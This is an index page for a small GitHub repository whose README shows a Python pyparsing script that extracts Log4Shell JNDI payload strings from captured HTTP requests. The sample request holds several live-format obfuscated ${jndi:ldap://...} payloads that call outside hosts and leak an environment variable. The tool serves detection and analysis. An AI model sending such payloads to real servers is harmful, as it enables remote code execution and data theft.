Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/imfht/log4shell_payload_extract
https://github.com/imfht/log4shell_payload_extract
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/imfht/log4shell_payload_extract
- Owner: imfht
- Created: 2021-12-17T13:09:37.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2023-06-05T05:24:29.000Z (over 1 year ago)
- Last Synced: 2024-02-11T21:17:46.913Z (7 months ago)
- Size: 2.93 KB
- Stars: 6
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - imfht/log4shell_payload_extract - (Others)
README
# extract log4shell payload
Question: How do I extract jndp payload like
```python
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//xxx.interactsh.com:80/${env:user}}
```
regex is cool but complex. let's use pyparsing! (You'll need to install pyparsing `pip install pyparsing` first)
```python
from pyparsing import *
value = """
POST /include?q=$%7Bjndi:ldap://xx:1389/ysgb0t%7D HTTP/1.1
Host: xxx.xxx.xxx:80
Transfer-Encoding: identity
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: ${jndi:ldap://78.31.71.248:1389/ysgb0t}
Cookie: acw_tc=xxx
User-Agent: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//xxx.interactsh.com:80/${env:user}}
args1=${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//xxx.interactsh.com:80/${env:user}}&args2=${jndi:ldap://xx:1389/ysgb0t}
"""
expr = Combine(nestedExpr('${', '}'))
single_value = QuotedString(quoteChar="${", endQuoteChar="}")
def extract_payloads(long_text):
for tokens, start, end in expr.scanString(long_text):
print(long_text[start:end])
if __name__ == '__main__':
extract_payloads(value)
```
Output:
```
${jndi:ldap://78.31.71.248:1389/ysgb0t}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//xxx.interactsh.com:80/${env:user}}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//xxx.interactsh.com:80/${env:user}}
${jndi:ldap://xx:1389/ysgb0t}
```
Hope it saves your time.